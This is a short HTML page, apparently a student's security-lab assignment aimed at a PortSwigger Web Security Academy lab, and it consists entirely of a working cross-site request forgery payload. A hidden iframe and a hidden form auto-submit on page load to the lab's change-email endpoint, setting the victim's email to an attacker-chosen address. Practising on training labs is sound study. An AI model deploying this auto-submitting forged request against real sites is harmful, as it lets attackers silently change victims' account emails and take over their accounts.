<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Test</title>
  </head>
  <body>
    <h1>cyber</h1>
    <p>assginmemt</p>

    <small
      >dnjddjndnee</small
    >
    <iframe style="display: none" name="csrf-iframe"></iframe>
    <form
      action="https://0a3700f6041c63328529412100e600c1.web-security-academy.net/my-account/change-email"
      method="POST"
      target="csrf-iframe"
      id="csrf-form"
    >
      <input type="hidden" name="email" value="ugotowned@lol.com" />
    </form>

    <script>
      document.getElementById("csrf-form").submit();
    </script>
  </body>
</html>
